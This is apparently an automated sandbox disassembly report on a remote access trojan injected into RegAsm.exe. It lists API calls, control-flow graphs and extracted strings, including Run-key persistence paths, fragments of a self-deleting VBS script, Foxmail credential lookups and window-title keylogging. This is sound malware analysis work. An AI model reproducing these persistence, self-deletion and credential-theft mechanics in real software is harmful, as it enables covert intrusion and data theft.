                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                          • String ID: | $%I64u$5.1.3 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-UP4CTA$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                                                                                                                          • API String ID: 524882891-4236367300
                                                                                                                                                                                          • Opcode ID: 3ea8c8ee83102c51e83ad385800eaf5c7d5d4fffea39b069a1ecff75720f6726
                                                                                                                                                                                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea8c8ee83102c51e83ad385800eaf5c7d5d4fffea39b069a1ecff75720f6726
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1042 40d0d1-40d0e7 call 41288b 1045 40d0f3-40d0fc 1042->1045 1046 40d0e9-40d0ee call 40b8e7 1042->1046 1048 40d103-40d10a 1045->1048 1049 40d0fe call 419b25 1045->1049 1046->1045 1051 40d10c-40d118 call 401f04 call 41c322 1048->1051 1052 40d11d-40d12d 1048->1052 1049->1048 1051->1052 1054 40d144-40d14f 1052->1054 1055 40d12f-40d13e call 401f04 call 413a5e 1052->1055 1056 40d151-40d15d call 401f04 call 413a5e 1054->1056 1057 40d163-40d169 1054->1057 1070 40d143 1055->1070 1074 40d162 1056->1074 1061 40d180-40d1d4 call 436f10 call 40247c call 401fab * 2 call 413733 1057->1061 1062 40d16b-40d17f call 401f04 call 413a5e 1057->1062 1084 40d1e6-40d214 call 401fab RegDeleteKeyA call 4077f2 1061->1084 1085 40d1d6-40d1e0 GetModuleFileNameW 1061->1085 1062->1061 1070->1054 1074->1057 1090 40d225-40d2ea SetFileAttributesW call 41ba09 call 41bcef call 403014 call 401f09 call 401fd8 call 43c11f call 40417e call 403014 call 40431d call 401f09 * 2 call 40417e call 4042fc call 401f09 1084->1090 1091 40d216-40d223 call 401f04 SetFileAttributesW 1084->1091 1085->1084 1122 40d343-40d39d call 40417e call 403014 * 2 call 40325d call 401f09 * 3 1090->1122 1123 40d2ec-40d33e call 40417e call 4042fc call 403014 call 40325d call 401f09 * 3 1090->1123 1091->1090 1151 40d3ad-40d3bd call 4077f2 1122->1151 1152 40d39f-40d3a8 call 40908d 1122->1152 1123->1122 1156 40d3fc-40d438 call 40908d call 401f04 call 40247c call 401f04 call 41c482 1151->1156 1157 40d3bf-40d3f7 call 40b9b7 call 403014 call 40325d call 401f09 * 2 1151->1157 1152->1151 1177 40d453-40d454 ExitProcess 1156->1177 1178 40d43a-40d44d call 401f04 ShellExecuteW 1156->1178 1157->1156 1178->1177
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CEB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                                                                                                          • API String ID: 3797177996-2483056239
                                                                                                                                                                                          • Opcode ID: b3de3bedabe62ad416ab522b7a84e19e16783d1f7d8fd3356589b09aed21c6d6
                                                                                                                                                                                          • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                                                                                                                          • Opcode Fuzzy Hash: b3de3bedabe62ad416ab522b7a84e19e16783d1f7d8fd3356589b09aed21c6d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1181 412aef-412b38 GetModuleFileNameW call 4020df * 3 1188 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 1181->1188 1213 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1188->1213 1236 412c66 1213->1236 1237 412c58-412c60 Sleep 1213->1237 1238 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1236->1238 1237->1213 1237->1236 1261 412d08 1238->1261 1262 412cfa-412d02 Sleep 1238->1262 1263 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1261->1263 1262->1238 1262->1261 1286 412daa-412dcf 1263->1286 1287 412d9c-412da4 Sleep 1263->1287 1288 412dd3-412def call 401f04 call 41c516 1286->1288 1287->1263 1287->1286 1293 412df1-412e00 call 401f04 DeleteFileW 1288->1293 1294 412e06-412e22 call 401f04 call 41c516 1288->1294 1293->1294 1301 412e24-412e3d call 401f04 DeleteFileW 1294->1301 1302 412e3f 1294->1302 1304 412e43-412e5f call 401f04 call 41c516 1301->1304 1302->1304 1310 412e61-412e73 call 401f04 DeleteFileW 1304->1310 1311 412e79-412e7b 1304->1311 1310->1311 1313 412e88-412e93 Sleep 1311->1313 1314 412e7d-412e7f 1311->1314 1313->1288 1315 412e99-412eab call 406b63 1313->1315 1314->1313 1317 412e81-412e86 1314->1317 1320 412f01-412f20 call 401f09 * 3 1315->1320 1321 412ead-412ebb call 406b63 1315->1321 1317->1313 1317->1315 1332 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1320->1332 1321->1320 1327 412ebd-412ecb call 406b63 1321->1327 1327->1320 1333 412ecd-412ef9 Sleep call 401f09 * 3 1327->1333 1348 412f63-412f89 call 401f09 call 405b05 1332->1348 1333->1188 1346 412eff 1333->1346 1346->1332 1353 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1348->1353 1354 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1348->1354 1423 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1353->1423 1354->1423
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CEB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                          • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                                                                                          • API String ID: 1223786279-2576077980
                                                                                                                                                                                          • Opcode ID: 5132b41fb64e7c875b93565344ef7c19bd5b15596ed0d4e4e7589b223b57b8eb
                                                                                                                                                                                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5132b41fb64e7c875b93565344ef7c19bd5b15596ed0d4e4e7589b223b57b8eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                            • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1840779552.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1839943215.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1840779552.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_10000000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                                                                                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                          • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                                                          • API String ID: 3795512280-1152054767
                                                                                                                                                                                          • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1594 4048c8-4048e8 connect 1595 404a1b-404a1f 1594->1595 1596 4048ee-4048f1 1594->1596 1599 404a21-404a2f WSAGetLastError 1595->1599 1600 404a97 1595->1600 1597 404a17-404a19 1596->1597 1598 4048f7-4048fa 1596->1598 1601 404a99-404a9e 1597->1601 1602 404926-404930 call 420cf1 1598->1602 1603 4048fc-404923 call 40531e call 402093 call 41b580 1598->1603 1599->1600 1604 404a31-404a34 1599->1604 1600->1601 1616 404941-40494e call 420f20 1602->1616 1617 404932-40493c 1602->1617 1603->1602 1606 404a71-404a76 1604->1606 1607 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1604->1607 1609 404a7b-404a94 call 402093 * 2 call 41b580 1606->1609 1607->1600 1609->1600 1626 404950-404973 call 402093 * 2 call 41b580 1616->1626 1627 404987-404992 call 421ad1 1616->1627 1617->1609 1656 404976-404982 call 420d31 1626->1656 1639 4049c4-4049d1 call 420e97 1627->1639 1640 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1627->1640 1653 4049d3-4049f6 call 402093 * 2 call 41b580 1639->1653 1654 4049f9-404a14 CreateEventW * 2 1639->1654 1640->1656 1653->1654 1654->1597 1656->1600
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • connect.WS2_32(FFFFFFFF,012D56C0,00000010), ref: 004048E0
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                          • API String ID: 994465650-2151626615
                                                                                                                                                                                          • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                                          • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3658366068-0
                                                                                                                                                                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                          • API String ID: 911427763-3954389425
                                                                                                                                                                                          • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1766 40da6f-40da94 call 401f86 1769 40da9a 1766->1769 1770 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1766->1770 1772 40dae0-40dae7 call 41c048 1769->1772 1773 40daa1-40daa6 1769->1773 1774 40db93-40db98 1769->1774 1775 40dad6-40dadb 1769->1775 1776 40dba9 1769->1776 1777 40db9a-40db9f call 43c11f 1769->1777 1778 40daab-40dab9 call 41b645 call 401f13 1769->1778 1779 40dacc-40dad1 1769->1779 1780 40db8c-40db91 1769->1780 1792 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1772->1792 1793 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1772->1793 1782 40dbae-40dbb3 call 43c11f 1773->1782 1774->1782 1775->1782 1776->1782 1788 40dba4-40dba7 1777->1788 1801 40dabe 1778->1801 1779->1782 1780->1782 1794 40dbb4-40dbb9 call 409092 1782->1794 1788->1776 1788->1794 1802 40dac2-40dac7 call 401f09 1792->1802 1793->1801 1794->1770 1801->1802 1802->1770
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongNamePath
                                                                                                                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                          • API String ID: 82841172-425784914
